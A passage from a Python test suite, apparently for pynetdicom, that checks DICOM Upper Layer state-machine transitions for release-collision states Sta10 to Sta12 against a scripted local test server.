assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt15"]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x00\x00"
)
def test_evt16(self):
"""Test Sta10 + Evt16."""
# Sta10 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_abort), # trigger event
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt16", "AA-3"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt16"]
def test_evt17(self):
"""Test Sta10 + Evt17."""
# Sta10 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.shutdown()
time.sleep(0.5)
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt17", "AA-4"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt17"]
def test_evt18(self):
"""Test Sta10 + Evt18."""
# Sta10 + Evt18 -> <ignore> -> Sta10
# Evt18: ARTIM timer expired from <local service>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.artim_timer.timeout = 0.05
assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:5] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt18"]
def test_evt19(self):
"""Test Sta10 + Evt19."""
# Sta10 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", b"\x08\x00\x00\x00\x00\x00\x00\x00"), # trigger event
("recv", a_abort), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:5] == ["Sta2", "Sta3", "Sta6", "Sta7", "Sta10"]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt19", "AA-8"),
]
assert fsm._events[:6] == ["Evt5", "Evt6", "Evt7", "Evt11", "Evt12", "Evt19"]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState11(TestStateBase):
"""Tests for State 11: Release collision req - awaiting A-RELEASE-RP PDU"""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta6")
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta9")
assoc.dul.send_pdu(self.get_release(True))
self.wait_on_state(assoc.dul.state_machine, "Sta11")
def test_evt01(self):
"""Test Sta11 + Evt1."""
# Sta11 + Evt1 -> <ignore> -> Sta11
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt1",
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta11 + Evt2."""
# Sta11 + Evt2 -> <ignore> -> Sta11
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta11 + Evt3."""
# Sta11 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("send", a_associate_ac),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt3", "AA-8"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt3",
]
def test_evt04(self):
"""Test Sta11 + Evt4."""
# Sta11 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("send", a_associate_rj),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt4", "AA-8"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt4",
]
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta11 + Evt5."""
# Sta11 + Evt5 -> <ignore> -> Sta11
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta11 + Evt6."""
# Sta11 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("send", a_associate_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt6", "AA-8"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt6",
]
def test_evt07(self):
"""Test Sta11 + Evt7."""
# Sta11 + Evt7 -> <ignore> -> Sta11
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt7",
]
def test_evt08(self):
"""Test Sta11 + Evt8."""
# Sta11 + Evt8 -> <ignore> -> Sta11
# Evt8: Receive A-ASSOCIATE (reject) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_associate("reject"))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt8",
]
def test_evt09(self):
"""Test Sta11 + Evt9."""
# Sta11 + Evt9 -> <ignore> -> Sta11
# Evt9: Receive P-DATA primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_pdata())
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt9",
]
def test_evt10(self):
"""Test Sta11 + Evt10."""
# Sta11 + Evt10 -> AA-8 -> Sta13
# Evt10: Receive P-DATA-TF PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("send", p_data_tf),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt10", "AA-8"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt10",
]
def test_evt11(self):
"""Test Sta11 + Evt11."""
# Sta11 + Evt11 -> <ignore> -> Sta11
# Evt11: Receive A-RELEASE (rq) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt11",
]
def test_evt12(self):
"""Test Sta11 + Evt12."""
# Sta11 + Evt12 -> AA-8 -> Sta13
# Evt12: Receive A-RELEASE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt12", "AA-8"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt12",
]
def test_evt13(self):
"""Test Sta11 + Evt13."""
# Sta11 + Evt13 -> AR-3 -> Sta1
# Evt13: Receive A-RELEASE-RP PDU from <remote>
# AR-3: Issue A-RELEASE (rp) primitive and close connection
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt13", "AR-3"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt13",
]
def test_evt14(self):
"""Test Sta11 + Evt14."""
# Sta11 + Evt14 -> <ignore> -> Sta11
# Evt14: Receive A-RELEASE (rsp) primitive from <local user>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_release(True))
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt14",
]
def test_evt15(self):
"""Test Sta11 + Evt15."""
# Sta11 + Evt15 -> AA-1 -> Sta13
# Evt15: Receive A-ABORT (rq) primitive from <local user>
# AA-1: Send A-ABORT PDU to <remote>, start ARTIM
commands = [
("recv", None), # recv a-associate-rq
("send", a_associate_ac),
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("recv", None), # recv a-release-rp
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.send_pdu(self.get_abort())
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt15", "AA-1"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt15",
]
def test_evt16(self):
"""Test Sta11 + Evt16."""
# Sta11 + Evt16 -> AA-3 -> Sta1
# Evt16: Receive A-ABORT PDU from <remote>
# AA-3: Issue A-ABORT or A-P-ABORT primitive, close connection
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("send", a_abort),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt16", "AA-3"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt16",
]
def test_evt17(self):
"""Test Sta11 + Evt17."""
# Sta11 + Evt17 -> AA-4 -> Sta1
# Evt17: Receive TRANSPORT_CLOSED from <transport service>
# AA-4: Issue A-P-ABORT primitive
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.shutdown()
time.sleep(0.5)
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt17", "AA-4"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt17",
]
def test_evt18(self):
"""Test Sta11 + Evt18."""
# Sta11 + Evt18 -> <ignore> -> Sta11
# Evt18: ARTIM timer expired from <local service>
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
self.assoc.dul.artim_timer.timeout = 0.05
self.assoc.dul.artim_timer.start()
time.sleep(0.5)
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:6] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
]
assert self.fsm._transitions[:5] == ["Sta4", "Sta5", "Sta6", "Sta7", "Sta9"]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt18",
]
def test_evt19(self):
"""Test Sta11 + Evt19."""
# Sta11 + Evt19 -> AA-8 -> Sta13
# Evt19: Received unrecognised or invalid PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("recv", None),
("send", a_associate_ac),
("recv", None),
("send", a_release_rq),
("recv", None),
("send", b"\x08\x00\x00\x00\x00\x00"),
("recv", None),
("exit", None),
]
self.scp = scp = self.start_server(commands)
self.move_to_state(self.assoc, scp)
scp.step()
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert self.fsm._changes[:7] == [
("Sta1", "Evt1", "AE-1"),
("Sta4", "Evt2", "AE-2"),
("Sta5", "Evt3", "AE-3"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta9", "Evt14", "AR-9"),
("Sta11", "Evt19", "AA-8"),
]
assert self.fsm._transitions[:6] == [
"Sta4",
"Sta5",
"Sta6",
"Sta7",
"Sta9",
"Sta11",
]
assert self.fsm._events[:7] == [
"Evt1",
"Evt2",
"Evt3",
"Evt11",
"Evt12",
"Evt14",
"Evt19",
]
@pytest.mark.filterwarnings("ignore:.*:pytest.PytestUnhandledThreadExceptionWarning")
class TestState12(TestStateBase):
"""Tests for State 12: Release collision acc - awaiting A-RELEASE (rp)"""
def move_to_state(self, assoc, scp):
def is_release_requested():
"""Override ACSE.is_release_requested."""
return False
assoc.acse.is_release_requested = is_release_requested
assoc.start()
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta6")
assoc.dul.send_pdu(self.get_release(False))
scp.step()
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta10")
scp.step()
self.wait_on_state(assoc.dul.state_machine, "Sta12")
def test_evt01(self):
"""Test Sta12 + Evt1."""
# Sta12 + Evt1 -> <ignore> -> Sta12
# Evt1: A-ASSOCIATE (rq) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("request"))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:6] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt1",
]
@pytest.mark.skip()
def test_evt02(self):
"""Test Sta12 + Evt2."""
# Sta12 + Evt2 -> <ignore> -> Sta12
# Evt2: Receive TRANSPORT_OPEN from <transport service>
pass
def test_evt03(self):
"""Test Sta12 + Evt3."""
# Sta12 + Evt3 -> AA-8 -> Sta13
# Evt3: Receive A-ASSOCIATE-AC PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("send", a_associate_ac), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt3", "AA-8"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt3",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt04(self):
"""Test Sta12 + Evt4."""
# Sta12 + Evt4 -> AA-8 -> Sta13
# Evt4: Receive A-ASSOCIATE-RJ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("send", a_associate_rj), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt4", "AA-8"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt4",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
@pytest.mark.skip()
def test_evt05(self):
"""Test Sta12 + Evt5."""
# Sta12 + Evt5 -> <ignore> -> Sta12
# Evt5: Receive TRANSPORT_INDICATION from <transport service>
pass
def test_evt06(self):
"""Test Sta12 + Evt6."""
# Sta12 + Evt6 -> AA-8 -> Sta13
# Evt6: Receive A-ASSOCIATE-RQ PDU from <remote>
# AA-8: Send A-ABORT PDU, issue A-P-ABORT primitive, start ARTIM
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-rq
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("send", a_associate_rq), # trigger event
("recv", None), # recv a-abort
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
scp.step()
scp.step()
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
assert fsm._changes[:7] == [
("Sta1", "Evt5", "AE-5"),
("Sta2", "Evt6", "AE-6"),
("Sta3", "Evt7", "AE-7"),
("Sta6", "Evt11", "AR-1"),
("Sta7", "Evt12", "AR-8"),
("Sta10", "Evt13", "AR-10"),
("Sta12", "Evt6", "AA-8"),
]
assert fsm._events[:7] == [
"Evt5",
"Evt6",
"Evt7",
"Evt11",
"Evt12",
"Evt13",
"Evt6",
]
assert scp.handlers[0].received[2] == (
b"\x07\x00\x00\x00\x00\x04\x00\x00\x02\x00"
)
def test_evt07(self):
"""Test Sta12 + Evt7."""
# Sta12 + Evt7 -> <ignore> -> Sta12
# Evt7: Receive A-ASSOCIATE (accept) primitive from <local user>
commands = [
("send", a_associate_rq),
("recv", None), # recv a-associate-ac
("recv", None), # recv a-release-rq
("send", a_release_rq), # collide
("send", a_release_rp),
("exit", None),
]
self.scp = scp = self.start_server(commands)
assoc, fsm = self.get_acceptor_assoc()
self.move_to_state(assoc, scp)
assoc.dul.send_pdu(self.get_associate("accept"))
scp.step()
scp.shutdown()
assert fsm._transitions[:6] == [
"Sta2",
"Sta3",
"Sta6",
"Sta7",
"Sta10",
"Sta12",
]
